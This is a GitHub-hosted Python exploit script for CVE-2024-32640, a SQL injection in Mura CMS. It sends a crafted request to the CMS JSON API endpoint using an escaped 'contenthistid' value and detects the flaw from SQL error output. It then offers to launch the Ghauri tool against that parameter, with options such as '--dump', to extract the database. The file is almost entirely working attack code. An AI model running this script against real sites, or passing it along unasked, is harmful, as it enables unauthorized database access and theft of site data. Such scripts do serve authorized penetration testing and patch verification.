-
Notifications
You must be signed in to change notification settings - Fork 9
/
CVE-2024-32640.py
112 lines (98 loc) · 4.91 KB
/
CVE-2024-32640.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
import requests
import argparse
import urllib3
import subprocess
from urllib.parse import urlparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
import shutil
#ANSI
RED = '\033[91m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
PURPLE = '\033[95m'
RESET = '\033[0m'
def banner():
print(f"""
▄▄▄▄███▄▄▄▄ ███ █▄ ▄████████ ▄████████ ▄█ ████████▄ ▄████████ ▄████████
▄██▀▀▀███▀▀▀██▄ ███ ███ ███ ███ ███ ███ ███ ███ ▀███ ███ ███ ███ ███
███ ███ ███ ███ ███ ███ ███ ███ ███ ███▌ ███ ███ ███ █▀ ███ ███
███ ███ ███ ███ ███ ▄███▄▄▄▄██▀ ███ ███ ███▌ ███ ███ ▄███▄▄▄ ▄███▄▄▄▄██▀
███ ███ ███ ███ ███ ▀▀███▀▀▀▀▀ ▀███████████ ███▌ ███ ███ ▀▀███▀▀▀ ▀▀███▀▀▀▀▀
███ ███ ███ ███ ███ ▀███████████ ███ ███ ███ ███ ███ ███ █▄ ▀███████████
███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ▄███ ███ ███ ███ ███
▀█ ███ █▀ ████████▀ ███ ███ ███ █▀ █▀ ████████▀ ██████████ ███ ███
███ ███ ███ ███
{YELLOW}CVE-2024-32640.py - SQL Injection in Mura CMS
{GREEN}Usage: python3 CVE-2024-32640.py --url https://example.com/
{PURPLE}Developer: @stuub{RESET}
""")
def isAlive(url):
try:
r = requests.get(url, verify=False)
if r.status_code == 200:
return True
else:
print(f"{RED}[-]{RESET} Target is not alive")
return False
except Exception as e:
print(f"Error: {e}")
return False
def Injection(url, endpoint):
SQL_ERROR_MESSAGE = "You have an error in your SQL syntax"
host = urlparse(url).netloc
headers = {
"Content-Type": "application/x-www-form-urlencoded",
"Host": host,
}
data = {
"object": "displayregion",
"contenthistid": "x%5c",
"previewid": "1"
}
print(f"{YELLOW}[!]{RESET} Checking for SQL Injection")
url = f"{url}{endpoint}"
r = requests.post(url, headers=headers, verify=False, data=data)
if SQL_ERROR_MESSAGE in r.text or r.status_code == 500:
print(f"{GREEN}[+]{RESET} Target is vulnerable to SQL Injection.\n")
print(f"{YELLOW}[!] For exploitation, use Ghauri:")
print(f"{GREEN}[+]{RESET} https://github.com/r0oth3x49/ghauri")
else:
print(f"{RED}[-]{RESET} Target is not vulnerable")
exit(1)
def Ghauri(url, sqli, endpoint):
print("\n")
print(f"{YELLOW}[!]{RESET} Checking existance of Ghauri")
if shutil.which("ghauri") is None:
print("{RED}[-]{RESET} Ghauri not installed or found in $PATH")
exit(1)
else:
print(f"{GREEN}[+]{RESET} Ghauri located!")
command = ["ghauri", "-u", url+endpoint, "-p", "contenthistid"]
if sqli:
command.extend(sqli)
else:
sqli = ""
print(f"{GREEN}[*]{RESET} Starting Ghauri")
print (f'{GREEN}[*]{RESET} Payload: ghauri -u "{url}{endpoint}" -p contenthistid',sqli)
subprocess.run(command)
def main():
parser = argparse.ArgumentParser(description="CVE-2024-32640.py - SQL Injection in Mura CMS")
parser.add_argument('-u', '--url', required=True, help="URL of the target")
parser.add_argument('-g', '--ghauri', nargs=argparse.REMAINDER, help="Parameters for Ghauri. Example: -g '--dump --threads 10'")
args = parser.parse_args()
url = args.url
sqli = args.ghauri
parsedUrl = urlparse(url)
strippedUrl = f"{parsedUrl.scheme}://{parsedUrl.netloc}"
url = strippedUrl
endpoint = "/_api/json/v1/default/?method=processAsyncObject&object=displayregion&contenthistid=x%5c&previewID=x"
if isAlive(url):
Injection(url, endpoint)
i = input("Do you want to exploit with Ghauri? (Y/N)")
if i.lower() == "y":
Ghauri(url, sqli, endpoint)
else:
return
if __name__ == "__main__":
banner()
main()